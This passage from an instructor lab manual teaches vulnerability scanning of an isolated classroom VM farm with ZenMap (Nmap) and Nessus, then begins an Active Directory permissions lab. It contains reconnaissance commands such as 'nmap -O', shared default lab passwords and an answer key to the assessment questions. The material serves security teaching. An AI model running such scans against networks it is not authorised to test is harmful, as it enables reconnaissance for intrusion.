2. A Virtualized Server Farm with:
   a. Microsoft DHCP server for allocating student IP host addresses
   b. A Student and/or Instructor VM workstation
3. Target VMs as described by the Lab:
   a. Student or Instructor VM with Nessus and ZenMap installed
   b. Windows 2003 Server Target
   c. Ubuntu Desktop 9.10 Linux Target
   d. Ubuntu Server 10.04 Linux Target
4. Standard ITT onsite student workstation must have the following software applications loaded to perform this lab:
   a. VMware Player 3.x
   b. Microsoft Office 2007 or higher for Lab Assessment Questions & Answers

Nessus v4.2.2 Vulnerability Assessment & Scanning Software

Training: Nessus and Network Scanning Curriculums

If your information security teaching/training organization uses Nessus in your curriculum to teach students how to scan for network vulnerabilities, the Tenable license allows you to use the HomeFeed subscription for your training purposes; the terms may be found in Tenable's HomeFeed and ProfessionalFeed Subscription Agreement.

Program Rights, Requirements and Limitations:

You are permitted to copy/build images and redistribute Tenable's Nessus and Tenable HomeFeed Plugins to students in/for the classroom setting only. Upon completion of the class, the ability to use the Plugins provided by the HomeFeed is terminated, and the students must re-register for either a HomeFeed or a ProfessionalFeed according to their intended use as is governed by the Subscription Agreement. Information security organizations and the students are not permitted to use the HomeFeed in a commercial fashion to secure their organizations or third-party networks. It is only to be used for demonstration and teaching purposes in a structured class environment. If you qualify for the right to use a Tenable subscription for your teaching/training organization, you are required to review the license agreement in its entirety. You will have the authorization to use the Nessus logo in your presentation of the class(es). If you choose to use the Nessus logo, it must always be accompanied by the following: Nessus is a Registered Trademark of Tenable Network Security, Inc. Tenable reserves the right to revoke a free subscription or terminate a subscription at its sole discretion at any time.

Nessus Overview

Nessus performs remote scans and audits of Unix, Windows, and network infrastructures. Nessus can perform a network discovery of devices, operating systems, applications, databases, and services running on those devices. Any non-compliant hosts running applications such as peer-to-peer, spyware or malware (worms, Trojans, etc.) are detected and identified. Nessus is capable of scanning all ports on every device and issuing remediation strategy suggestions as required.
Nessus includes the ability to perform in-depth web application audits that identify vulnerabilities in custom built applications. Custom web applications can have their operating system, application, and SQL database audited and hardened against a variety of industry best practices and recommendations.

Recommended Procedures

Instructor Demo Lab #2:

The instructor will demonstrate performing an initial reconnaissance & probing scan of a targeted IP subnetwork containing the VM server farm using ZenMap GUI (Nmap); this was performed previously in Lab #1 but is repeated in Lab #2. From this initial scan, specific information about targeted VM servers can be obtained to perform a vulnerability assessment scan on the targeted server. The instructor will perform a vulnerability assessment scan using Nessus by first defining how to create a Policy Definition to perform the targeted vulnerability assessment scan.

Hands-on Lab #2 Instructor Steps:

The following presents the steps needed to perform this vulnerability assessment scan on the targeted IP subnetwork and VM server farm:
1. Connect the instructor-removable hard drive to your workstation
2. Boot up the Instructor VM and Microsoft DHCP VM server to allocate an IP host address
3. Enable your DOS command prompt and type ipconfig and ping your allocated IP host address 172.30.0.__ , the DHCP server 172.30.0.10, and the IP default gateway router 172.30.0.1
4. Login to your Instructor VM workstation and obtain an IP host address from the DHCP server connected to the layer 2 switch
   Login ID: instructor or student (case sensitive)
   Password: ISS316Security (case sensitive)

NOTE: If the workstations in your physical classroom have only 2GB of RAM then only two VMs can be powered-on at once. You have to split the VM server farm into 2 physical workstations, loading 2 VM servers in each (WindowsDHCP01 and TargetWindows01) and (TargetUbuntu01 and TargetUbuntu02) to maximize performance.

Run ZenMap GUI (Nmap) and Perform an IP Discovery and IP Host Scan
1. Click and enable ZenMap GUI from the Instructor VM desktop
2. Insert the target IP subnetwork number of 172.30.0.0/24 into the Nmap Target IP address field (Refer to Figure 3 below)
3. Select Intense Scan from the drop-down menu to the right of the Target IP address field (Refer to Figure 3 below)

Figure 3 ZenGUI Nmap Target IP Address & Intense Scan Dropdown Menu

4. Click on Start Scan to perform the Intense Scan on the Targeted IP subnetwork
5. The instructor will run the Intense Scan while projecting the real-time results of the tests on the overhead projector for the students to see and ask questions
6. Upon completion of the Intense Scan using ZenMap GUI (Nmap) as a reconnaissance and probing tool, the instructor will review the output created by the Nmap scan

Run Nessus and Perform a Vulnerability Assessment Scan
1. Load the Nessus v4.2.2.2 Server Manager on the Instructor VM
2. Connect to the Nessus v4.2.2.2 Server Manager via an HTTPS:// secured browser connection as follows: https://[IP host address]:8834/ in the navigation bar (at your Instructor VM DOS prompt, type ipconfig to display your IP host address)
3. Login to the Nessus Server Manager via your secure browser connection and authenticate

Figure 4 Nessus Server Manager v4.2.2.2

4. From the Policies menu toolbar, select Lab 4 (don't worry about the #4) and Import into your Nessus Server Manager. If there is no Lab 4 policy definition, click on Policies and create a new IT255 Lab 2 Policy definition as follows:
   a. Click on Policies +Add
   b. Create a New Policy Definition: IT255 Lab 2 Policy
   c. Select all the Default Values in the IT255 Lab 2 Policy Definition
   d. Save the IT255 Lab 2 Policy Definition Using the Default Values
5. After loading a policy, you can create a new scan by clicking on the Scans option on the menu bar at the top and then clicking on the + Add button on the right. The Add Scan screen will be displayed as follows:

Figure 5 Nessus Server Manager Add Policy Menu

6. There are five fields to enter the scan target:
   o Name: Sets the name that will be displayed in the Nessus UI to identify the scan. Add Name: IT255 Lab #2 Server Farm Scan
   o Type: Choose between Run Now (immediately execute the scan after submitting) or Template (save as a template for repeat scanning). Choose: Run Now
   o Policy: Select a previously created policy that the scan will use to set parameters controlling Nessus server scanning behavior. Choose: IT255 Lab 2 Policy
   o Scan Targets: Targets can be entered by single IP address (e.g., 192.168.0.1), IP range (e.g., 192.168.0.1-192.168.0.255), subnet with CIDR notation (e.g., 192.168.0.0/24) or resolvable host (e.g., www.nessus.org). Insert: X.X.X.X-X.X.X.X or X.X.X.X/24. Enter the IP subnetwork number of the ASA_Instructor VLAN where the server farm resides: 172.30.0.0/24.
   o Targets File: A text file with a list of hosts can be imported by clicking on Browse and selecting a file from the local machine. Example host file formats:
      Individual hosts: 192.168.0.100, 192.168.0.101, 192.168.0.102
      Host range: 192.168.0.100-192.168.0.102
      Host CIDR block: 192.168.0.1/24
7. After you have entered the scan information, click on Submit.
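The Scan Targets field and a targets file accept the same four forms (single address, address range, CIDR block, resolvable host), and the same field list appears again in the student steps. As an added example for both, written for this page and not part of Nessus, the following Python expands those forms and checks every resulting address against the block the lab authorises for scanning, 172.30.0.0/24; the hostname pattern, the constructed targets file and the authorised list are assumptions.

```python
"""Expand the target formats Nessus accepts in Scan Targets / a targets file
and check the result against an authorised scope.  Added example written for
this page; it is not Nessus code."""
import ipaddress
import re

# Syntactic hostname check only (labels of letters, digits and hyphens); names
# are not resolved, so the check runs offline.  The pattern is an assumption.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")

# Constructed targets-file contents in the formats the manual lists.
SAMPLE_TARGETS = "172.30.0.10, 172.30.0.1\n192.168.0.100-192.168.0.102\nwww.nessus.org\n"


def expand_target(token):
    """Addresses (as strings) one target token denotes; hostnames pass through.

    Handles 192.168.0.1, 192.168.0.100-192.168.0.102, 192.168.0.1/24
    (host bits allowed, as Nessus accepts them) and www.nessus.org."""
    token = token.strip()
    if not token:
        return []
    if "/" in token:
        # strict=False turns 192.168.0.1/24 into the block 192.168.0.0/24;
        # every address in the block is returned, network and broadcast included.
        return [str(a) for a in ipaddress.ip_network(token, strict=False)]
    parts = token.split("-", 1)
    if len(parts) == 2:
        try:
            lo = ipaddress.ip_address(parts[0].strip())
            hi = ipaddress.ip_address(parts[1].strip())
        except ValueError:
            pass  # not an address range; may be a hyphenated host name
        else:
            if hi < lo:
                raise ValueError(f"range {token!r} runs backwards")
            return [str(ipaddress.ip_address(int(lo) + i)) for i in range(int(hi) - int(lo) + 1)]
    try:
        return [str(ipaddress.ip_address(token))]
    except ValueError:
        # All-numeric names (e.g. a mistyped address like 192.168.0.300) are rejected.
        if HOSTNAME_RE.match(token) and not token.replace(".", "").isdigit():
            return [token]
        raise ValueError(f"unrecognised target {token!r}")


def expand_targets(text):
    """Expand a Scan Targets entry or targets-file contents; entries may be
    separated by commas, spaces or newlines."""
    targets = []
    for token in re.split(r"[,\s]+", text):
        targets.extend(expand_target(token))
    return targets


def check_scope(targets, authorised_blocks):
    """Split expanded targets into (in_scope, out_of_scope) lists.

    Host names land in out_of_scope because they are not resolved here; resolve
    them and re-check before scanning.  Anything outside the blocks covered by
    written authorisation must not be submitted to the scanner."""
    nets = [ipaddress.ip_network(b) for b in authorised_blocks]
    in_scope, out_of_scope = [], []
    for t in targets:
        try:
            addr = ipaddress.ip_address(t)
        except ValueError:
            out_of_scope.append(t)
            continue
        (in_scope if any(addr in n for n in nets) else out_of_scope).append(t)
    return in_scope, out_of_scope


if __name__ == "__main__":
    ok, bad = check_scope(expand_targets(SAMPLE_TARGETS), ["172.30.0.0/24"])
    print(f"{len(ok)} target(s) in scope; not submitting {bad}")
```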
After submitting, the scan will begin immediately before the display is returned to the general Scans page. Figure 6 Nessus Server Manager Scans Page Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -28- IT255 Instructor Lab Manual LABORATORY 8. Once a scan has launched, the Scans list will display a list of all scans currently running or paused along with basic information about the scan. After selecting a particular scan on the list, the action buttons on the top right allow you to Browse the results of the scan in progress, Pause and Resume the scan or Stop the scan completely. 9. When a scan has completed, it will be removed from the Scans list and be available for review on the Reports tab. 10. Clicking on the Reports tab on the menu bar at the top of the interface will bring up the list of running and completed scans. The Reports screen acts as a central point for viewing, comparing, uploading and downloading scan results. Figure 7 Nessus Server Manager Reports Page 11. To browse the results of a scan, select a name from the Reports list and click on Browse. This allows you to view results by navigating through hosts, ports and then specific vulnerabilities. The first summary screen shows each host scanned along with a breakdown of vulnerabilities and open ports: Figure 8 Nessus Server Manager Reports Page Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -29- IT255 Instructor Lab Manual LABORATORY 12. With a host selected, port number will segregate the report and display associated information such as the protocol and service name, as well as a summary of vulnerabilities categorized by risk severity. 
As you navigate through the scan results, the user interface will maintain the list of hosts as well as a series of clickable arrows to assist in quick navigation to a specific component of the report: Figure 9 Nessus Server Manager Host Scan Report Results 13. Selecting a port will display all of the vulnerability findings associated with the port and service. In the example below, we see that host 192.168.0.10 has 13 vulnerabilities associated with TCP port 445 (CIFS or Common Internet File System). The summary of findings displays the Nessus Plugin ID, vulnerability name, port, protocol and severity. Figure 10 Nessus Server Manager Host Scan Vulnerability Findings Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -30- IT255 Instructor Lab Manual LABORATORY By clicking once on any column heading, the results can be sorted by the columns content. Clicking a second time will reverse sort the results: Figure 11 Nessus Server Manager Host Scan Sorted Vulnerability Findings 14. Selecting a vulnerability from the list will display all details of the finding including a technical description, references, solution, detailed risk factor and any relevant output demonstrating the finding: Figure IN3 Nessus Server Manager Vulnerability Details Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -31- IT255 Instructor Lab Manual LABORATORY 15. Capture your scan report and save your scan report in softcopy in HTML format (click on the pull-down menu and select) 16. Close your Nessus Server Manager and Nessus Client session 17. Answer the Lab #2 Lab Assessment Questions & Answers Hands-on Lab #2 Student Steps: The following presents the steps needed to perform this vulnerability assessment scan on the targeted IP subnetwork and VM server farm: 1. Connect your student removable hard drive to your workstation 2. 
Boot up the Student VM and Microsoft DHCP VM server to allocate an IP host address 3. Enable your DOS command prompt and type ipconfig and ping your allocated IP host address 172.30.0.__ , the DHCP server 172.30.0.10, and the IP default gateway router 172.30.0.1 4. Login to your Instructor VM workstation and obtain an IP host address from the DHCP server connected to the layer 2 switch NOTE: If the workstations in your physical classroom have only 2GB of RAM then only two VMs can be powered-on at once. For this lab, all you need to power-up is the Student VM workstation. Run ZenMap GUI (Nmap) and Perform an IP Discovery and IP Host Scan 1. Click and enable ZenMap GUI from the Instructor VM desktop 2. Insert the target IP subnetwork number of 172.30.0.0/24 into the Nmap Target IP address field (Refer to Figure 18) 3. Select Intense Scan from the drop-down menu to the right of the Target IP address field (Refer to Figure 18) Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -32- IT255 Instructor Lab Manual LABORATORY Figure 3 ZenGUI Nmap Target IP Address & Intense Scan Dropdown Menu 4. Click on Start Scan to perform the Intense Scan on the Targeted IP subnetwork 5. The instructor will run the Intense Scan while projecting the real-time results of the tests on the overhead projector for the students to see and ask questions 6. Upon completion of the Intense Scan using ZenMap GUI (Nmap) as a reconnaissance and probing tool, the instructor will review the output created by the Nmap scan Run Nessus and Perform a Vulnerability Assessment Scan 1. Load the Nessus v4.2.2.2 Server Manager on the Instructor VM 2. Connect to the Nessus v4.2.2.2 Server Manager via an HTTPS:// secured browser connection as follows: https:// [IP host address]:8834/ in the navigation bar (at your Instructor VM DOS prompt, type ipconfig to display your IP host address 3. 
Login to the Nessus Server Manager via your secure browser connection and authenticate Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -33- IT255 Instructor Lab Manual LABORATORY Figure 4 Nessus Server Manager v4.2.2.2 4. From the Policies menu toolbar, select Lab 4 and Import into your Nessus Server Manager. If there is no Lab 4 policy definition click on Policies and create a new IT255 Lab 2 Policy definition as follows: a. Click on Policies +Add b. Create a New Policy Definition: IT255 Lab 2 Policy c. Select all the Default Values in the IT255 Lab 2 Policy Definition d. Save the IT255 Lab 2 Policy Definition Using the Default Values 5. After loading a policy, you can create a new scan by clicking on the Scans option on the menu bar at the top and then click on the + Add button on the right. The Add Scan screen will be displayed as follows: Figure 5 Nessus Server Manager Add Policy Menu Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -34- IT255 Instructor Lab Manual LABORATORY 6. There are five fields to enter the scan target: o Name Sets the name that will be displayed in the Nessus UI to identify the scan. Add Name: IT255 Lab #2 Server Farm Scan o Type Choose between Run Now (immediately execute the scan after submitting) or Template (save as a template for repeat scanning). Choose: Run Now o Policy Select a previously created policy that the scan will use to set parameters controlling Nessus server scanning behavior. Choose: IT255 Lab 2 Policy o Scan Targets Targets can be entered by single IP address (e.g., 192.168.0.1), IP range (e.g., 192.168.0.1-192.168.0.255), subnet with CIDR notation (e.g., 192.168.0.0/24) or resolvable host (e.g., www.nessus.org). Insert: X.X.X.X X.X.X.X or X.X.X.X/24. Enter the IP subnetwork number of the ASA_Instructor VLAN where the server farm resides: 172.30.0.0/24. 
o Targets File A text file with a list of hosts can be imported by clicking on Browse and selecting a file from the local machine. Example host file formats and individual hosts: 192.168.0.100, 192.168.0.101, 192.168.0.102 Host range: 192.168.0.100-192.168.0.102 Host CIDR block: 192.168.0.1/24 7. After you have entered the scan information, click on Submit. After submitting, the scan will begin immediately before the display is returned to the general Scans page. Figure 6 Nessus Server Manager Scans Page Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -35- IT255 Instructor Lab Manual LABORATORY 8. Once a scan has launched, the Scans list will display a list of all scans currently running or paused along with basic information about the scan. After selecting a particular scan on the list, the action buttons on the top right allow you to Browse the results of the scan in progress, Pause and Resume the scan or Stop the scan completely. 9. When a scan has completed, it will be removed from the Scans list and be available for review on the Reports tab. 10. Clicking on the Reports tab on the menu bar at the top of the interface will bring up the list of running and completed scans. The Reports screen acts as a central point for viewing, comparing, uploading and downloading scan results. Figure 7 Nessus Server Manager Reports Page 11. To browse the results of a scan, select a name from the Reports list and click on Browse. This allows you to view results by navigating through hosts, ports and then specific vulnerabilities. The first summary screen shows each host scanned along with a breakdown of vulnerabilities and open ports: Figure 8 Nessus Server Manager Reports Page Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -36- IT255 Instructor Lab Manual LABORATORY 12. 
With a host selected, port number will segregate the report and display associated information such as the protocol and service name, as well as a summary of vulnerabilities categorized by risk severity. As you navigate through the scan results, the user interface will maintain the list of hosts as well as a series of clickable arrows to assist in quick navigation to a specific component of the report: Figure 9 Nessus Server Manager Host Scan Report Results 13. Selecting a port will display all of the vulnerability findings associated with the port and service. In the example below, we see that host 192.168.0.10 has 13 vulnerabilities associated with TCP port 445 (CIFS or Common Internet File System). The summary of findings displays the Nessus Plugin ID, vulnerability name, port, protocol and severity. Figure 10 Nessus Server Manager Host Scan Vulnerability Findings Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -37- IT255 Instructor Lab Manual LABORATORY By clicking once on any column heading, the results can be sorted by the columns content. Clicking a second time will reverse sort the results: Figure 11 Nessus Server Manager Host Scan Sorted Vulnerability Findings 14. Selecting a vulnerability from the list will display full details of the finding including a technical description, references, solution, detailed risk factor and any relevant output demonstrating the finding: Deliverables Upon completion of the vulnerability assessment and scanning lab, students are required to submit the following deliverables: 1. Lab #2 ZenMap GUI scan report in softcopy with annotated notes on what was found 2. Lab #2 Nessus vulnerability scan report in HTML soft copy 3. Lab #2 Lab Assessment Questions and Answers Evaluation Criteria and Rubrics The following are the evaluation criteria and rubrics for Lab #2 that the students must perform: 1. 
Was the student able to identify risks, threats, and vulnerabilities in an IP network infrastructure using ZenMap GUI (Nmap) to perform an IP host, port, and services scan? [20%] 2. Was the student able to perform a vulnerability assessment scan on a targeted IP subnetwork using Nessus? [20%] Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -38- IT255 Instructor Lab Manual LABORATORY 3. Was the student able to compare the results of the ZenMap GUI Intense Scan with a Nessus vulnerability assessment scan and make a distinction? [20%] 4. Was the student able to assess the findings of the vulnerability assessment scan and identify critical vulnerabilities? [20%] 5. Was the student able to make recommendations for mitigating the identified risks, threats, and vulnerabilities as described by the CVE listing for the found vulnerabilities? [20%] Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -39- IT255 Instructor Lab Manual LABORATORY Lab #2 Assessment Worksheet Perform a Vulnerability Assessment Scan Using Nessus Course Name & Number: ______________________________________________________________ Student Name: _______________________________________________________________________ Instructor Name: _____________________________________________________________________ LAB Due Date: _______________________________________________________________________ Overview This lab demonstrates the first 3 steps in the hacking process that is typically performed when conducting ethical hacking or penetration testing. The first step in the hacking process is to perform an IP host discovery and port/services scan (Step 1: Reconnaissance & Probing) on a targeted IP subnetwork using ZenMap GUI (Nmap) security scanning software. 
The second step in the hacking process is to perform a vulnerability assessment scan (Step 2: Scanning) on the targeted IP subnetwork using Nessus vulnerability assessment scanning software. Finally, the third step in the hacking process (Step 3: Enumeration) is to identify information pertinent to the vulnerabilities found in order to exploit the vulnerability. Lab Assessment Questions & Answers 1. What is the application ZenMap GUI typically used for? Describe a scenario in which you would use this type of application. Used for port scanning and passive OS fingerprinting. It can be used in an organization to quickly identify hosts on a particular section of the network or identify what services are running on a particular host when it is unknown or there is no local access to the system. ZenMap GUI (Nmap) is typically used during Step #1 of the hacking process: Reconnaissance & Probing. 2. What is the relationship between risks, threats and vulnerabilities as it pertains to Information Systems Security throughout the seven domains of a typical IT infrastructure? Without threats or vulnerabilities you have a very low risk of having an incident. The more likely a threat can exploit any particular vulnerability the higher the risk becomes. Risk mitigation must include finding and eliminating known vulnerabilities and exploits. Copyright 2012 Jones & Bartlett Learning, LLC www.jblearning.com All Rights Reserved. Current Version Date: 12/06/2010 -40- IT255 Instructor Lab Manual LABORATORY 3. Which application is used for Step #2 in the hacking process to perform a vulnerability assessment scan? Nessus is a vulnerability assessment scanner that can be downloaded for HOME and educational use but also can be licensed for corporate, enterprise features and functions. 4. Before you conduct an ethical hacking process or penetration test on a live production network, what must you do prior to performing the reconnaissance and probing and scanning procedures? 
Written permission! You must obtain written authorization from the system owner before performing an intrusive penetration test or vulnerability assessment scan on a live production network; the authorization should state which IP address ranges may be scanned and during which time window.
5. What is a CVE listing? Who hosts and who sponsors the CVE database listing website?
CVE stands for Common Vulnerabilities and Exposures. The MITRE Corporation hosts the CVE list (http://cve.mitre.org/) under contract with its sponsor, the U.S. Department of Homeland Security's National Cyber Security Division. A CVE entry assigns a standard identifier (CVE-year-sequence number) and a short description to each publicly known vulnerability or exposure, with references to the vendor advisories that describe the software patches and updates that mitigate it.
6. Can ZenMap GUI detect what operating systems are present on IP servers and workstations? What would that option look like in the command line if running a scan on 172.30.0.10?
Yes, ZenMap GUI can perform OS fingerprinting scans. The -O option enables OS detection, so the command line would be nmap -O 172.30.0.10 (OS detection uses raw packets, so the scan must be run with Administrator or root privileges). In ZenMap GUI you can select the Intense Scan profile, which includes the -O OS fingerprinting option.
7. If you have scanned a live host and detected that it is running the Windows XP workstation OS, how would you use this information for performing a Nessus vulnerability assessment scan?
You can limit the Nessus vulnerability assessment scan to the plugin families that apply to Microsoft Windows, which shortens the scan and removes irrelevant findings; the detected OS also tells you which CVE entries to check the Nessus results against.
8. Once a vulnerability is identified by Nessus, where can you check for more information regarding the identified vulnerability, exploits, and the risk mitigation solution?
The CVE database listing website at http://cve.mitre.org/. Each Nessus finding carries the CVE identifier(s) it relates to, and the CVE entry links to the vendor advisories that describe the fix.
9. What is the major difference between ZenMap GUI and Nessus?
ZenMap GUI is used to perform the initial IP host discovery and port/services scan. Nessus is used to perform a vulnerability assessment of the software (OS, applications, etc.) loaded on servers and workstations; any known vulnerabilities or bugs will be flagged and identified by Nessus.
10. Why do you need to run both ZenMap GUI and Nessus to perform the first 3 steps of the hacking process?
ZenMap GUI and Nessus perform different tasks and steps in the hacking process: IP host discovery and the port/services scan (ZenMap GUI), and the full vulnerability assessment scan (Nessus). Together they cover the first 3 steps of the hacking process.

Laboratory #3
Lab #3: Enable Windows Active Directory and User Access Controls

Learning Objectives and Outcomes
Upon completing this lab, students will be able to complete the following tasks:
Design a Windows Active Directory and user access control framework
Create a new Windows Active Directory domain controller
Evaluate existing user and group permission rights in Active Directory user accounts and their workstations
Create new Windows Active Directory users and groups with custom permission rights
Create and verify access control lists to protect objects and folders from unauthorized access

Required Setup and Tools
This lab does not require the use of the ISS Mock IT Infrastructure - Cisco core backbone network. In addition, the Instructor VM workstation and Student VM workstations should be physically disconnected from the ITT internal network and be isolated on a dedicated layer 2 switch. This will allow a shared DHCP server to be used to allocate the IP addresses for the instructor and student workstations. The following are required for this hands-on lab:
A) A classroom workstation (with at least 2 GB RAM) capable of supporting an insertable hard drive or USB hard drive with a pre-configured virtualized server farm.
This classroom workstation/server will support the virtualized server farm connected to the ASA_Instructor VLAN.
B) An instructor workstation (with at least 2 GB RAM) that shall act as the instructor's demonstration LAB workstation. The instructor will display the Instructor workstation on the LCD projector to demonstrate the loading and configuring of the ITT Mock IT Infrastructure and Server Farm with VMware Player.
C) Student LAB workstations will use a local copy of the ITT Mock IT Infrastructure Server Farm on a local or USB hard drive with VMware Player to run their Student and Target VMs.

The following summarizes the setup, configuration, and equipment needed to perform Lab #3:
1. A Virtualized Server Farm with the following components:
a. Microsoft DHCP server for allocating student IP host addresses
b. A Student and/or Instructor VM workstation
2. Target VMs as described by the lab:
a. WindowsTarget01 Server
i. Roles that will be installed: Active Directory Services and DNS Server
b. Administrator account access on the WindowsTarget01 VM Server
Windows Server 2003 Standard Edition 32-bit (VM Name: TargetWindows01)
o Computer Name: Windows02
o Three Users Available: administrator, instructor or student (case sensitive)
o Password: ISS316Security
o IP Address: DHCP
o Domain Login: NO
c. Administrator account access on the Student VM Workstation
3. The standard ITT onsite student workstation must have the following software applications loaded to perform this lab:
a. VMware Player 3.x
b. Microsoft Office 2007 or higher for the Lab Assessment Questions & Answers

Recommended Procedures
Instructor Demo Lab #3:
The instructor will demonstrate logging on to the WindowsTarget01 server and will create a new Active Directory domain. The instructor will demonstrate how to configure Windows Active Directory users with the Active Directory Users and Computers snap-in. In addition, the instructor will show the students how to create user accounts and groups, and how to configure role-based access permissions and access control lists on objects and folders within the Windows Active Directory system.

Hands-on Lab #3 Instructor Steps:
The instructor will perform the following demonstration:
1. Connect the instructor removable hard drive to your workstation.
2. Boot up the Instructor VM and the Microsoft DHCP VM server to allocate an IP host address.
3. Open a command prompt (cmd.exe), type ipconfig, and ping your allocated IP host address 172.30.0.__, the DHCP server 172.30.0.10, and the IP default gateway router 172.30.0.1.
4. Log in to your Instructor VM workstation and obtain an IP host address from the DHCP server connected to the layer 2 switch.
NOTE: If the workstations in your physical classroom have only 2 GB of RAM, then only two VMs can be powered on at once. You can power on WindowsDHCP01 and TargetWindows01 together to maximize performance, or you can load the WindowsDHCP01 VM server on a separate workstation connected to the classroom layer 2 switch. This will allow you to load the Instructor VM workstation and the TargetWindows01 VM server on the same physical workstation.
5. Log in to the WindowsTarget01 VM server as administrator.
6. On the WindowsTarget01 VM click Start > Run and type: dcpromo
7. Answer all the necessary questions to create a new Active Directory forest, enabling DNS, and reboot.
8. Log in to WindowsTarget01 as an administrator of the new domain.
9. Create the following global domain user accounts and groups using Active Directory Users and Computers (Start -> Administrative Tools -> Active Directory Users and Computers):
a. ShopFloor group
b. HumanResources group
c. Manager group
d. SFuser01 user account (use SFuser01pass for the password), member of the ShopFloor group
e. SFmanager user account (use SFmanagerpass for the password), member of the ShopFloor and Manager groups
f. HRuser01 user account (use HRuser01pass for the password), member of the HumanResources group
g. Manager01 user account (use Manager01pass for the password), member of the HumanResources and Manager groups
NOTE: A new Windows Server 2003 domain enables "Password must meet complexity requirements" in the Default Domain Policy by default, and that rule rejects any password that contains the account name (SFuser01pass contains SFuser01). If account creation fails for this reason, temporarily disable the complexity setting in the Default Domain Policy for the lab, or choose passwords that do not contain the account name.
10. Create four new folders:
a. C:\ERPdocuments - this folder will contain miscellaneous shared files for the ERP software
b. C:\ERPdocuments\HRfiles - folder for shared Human Resources (HR) user files
c. C:\ERPdocuments\SFfiles - folder for shared Shop Floor (SF) user files
d. C:\ERPdocuments\MGRfiles - folder for shared Manager user files
11. Determine what type of access controls (NTFS permissions on each folder, granted to the groups rather than to individual users) are needed to allow the following actions and nothing more:
a. Allow Shop Floor users to read and write files in C:\ERPdocuments\SFfiles.
b. Allow Human Resources users to read and write files in C:\ERPdocuments\HRfiles.
c. Allow Manager01 to read and write files in C:\ERPdocuments\MGRfiles and C:\ERPdocuments\HRfiles.
12. Perform the following steps to evaluate the effectiveness of your access controls:
a. Log in as SFuser01.
b. Use Notepad to create a new text file, lab1file.txt, in C:\ERPdocuments\SFfiles.
c. Attempt to create a new text file, lab1file.txt, in C:\ERPdocuments\HRfiles (this should be denied).
d. Log in as HRuser01.
e. Use Notepad to create a new text file, lab2file.txt, in C:\ERPdocuments\HRfiles.
f. Attempt to create a new text file, lab2file.txt, in C:\ERPdocuments\SFfiles (this should be denied).
13. Log in as Manager01 and verify that you can read and write files in C:\ERPdocuments\HRfiles and C:\ERPdocuments\MGRfiles, but not in C:\ERPdocuments\SFfiles.
NOTE: By default, ordinary domain users are not permitted to log on locally at a domain controller. For steps 12 and 13, either log on from a domain-joined workstation, or grant the ShopFloor, HumanResources and Manager groups the "Allow log on locally" user right in the Default Domain Controllers Policy for the duration of the lab.

Hands-on Lab #3 Student Steps:
To perform this hands-on lab, students are required to perform the following steps:
1. Connect the student removable hard drive to your workstation.
2. Boot up the Student VM and the Microsoft DHCP VM server to allocate an IP host address.
3. Open a command prompt (cmd.exe), type ipconfig, and ping your allocated IP host address 172.30.0.__, the DHCP server 172.30.0.10, and the IP default gateway router 172.30.0.1.
4. Log in to your Student VM workstation and obtain an IP host address from the DHCP server connected to the layer 2 switch.
NOTE: If the workstations in your physical classroom have only 2 GB of RAM, then only two VMs can be powered on at once. You can power on WindowsDHCP01 and TargetWindows01 together to maximize performance, or you can load the WindowsDHCP01 VM server on a separate workstation connected to the classroom layer 2 switch. This will allow you to load the Student VM workstation and the TargetWindows01 VM server on the same physical workstation.
5. Log in to the WindowsTarget01 VM server as administrator.
6. On the WindowsTarget01 VM click Start > Run and type: dcpromo
7. Answer all the necessary questions to create a new Active Directory forest, enabling DNS, and reboot.
8. Log in to WindowsTarget01 as an administrator of the new domain.
9. Create the following global domain user accounts and groups using Active Directory Users and Computers (Start -> Administrative Tools -> Active Directory Users and Computers):
a. ShopFloor group
b. HumanResources group
c. Manager group
d. SFuser01 user account (use SFuser01pass for the password), member of the ShopFloor group
e. SFmanager user account (use SFmanagerpass for the password), member of the ShopFloor and Manager groups
f. HRuser01 user account (use HRuser01pass for the password), member of the HumanResources group
g. Manager01 user account (use Manager01pass for the password), member of the HumanResources and Manager groups
NOTE: If the default password complexity policy rejects these passwords because they contain the account name, ask the instructor to relax the complexity setting in the Default Domain Policy for the lab, or choose passwords that do not contain the account name.
10. Create four new folders:
a. C:\ERPdocuments - this folder will contain miscellaneous shared files for the ERP software
b. C:\ERPdocuments\HRfiles - folder for shared Human Resources (HR) user files
c. C:\ERPdocuments\SFfiles - folder for shared Shop Floor (SF) user files
d. C:\ERPdocuments\MGRfiles - folder for shared Manager user files
11. Determine what type of access controls (NTFS permissions on each folder, granted to the groups rather than to individual users) are needed to allow the following actions and nothing more:
a. Allow Shop Floor users to read and write files in C:\ERPdocuments\SFfiles.
b. Allow Human Resources users to read and write files in C:\ERPdocuments\HRfiles.
c. Allow Manager01 to read and write files in C:\ERPdocuments\MGRfiles and C:\ERPdocuments\HRfiles.
12. Perform the following steps to evaluate the effectiveness of your access controls:
a. Log in as SFuser01.
b. Use Notepad to create a new text file, lab1file.txt, in C:\ERPdocuments\SFfiles.
c. Attempt to create a new text file, lab1file.txt, in C:\ERPdocuments\HRfiles (this should be denied).
d. Log in as HRuser01.
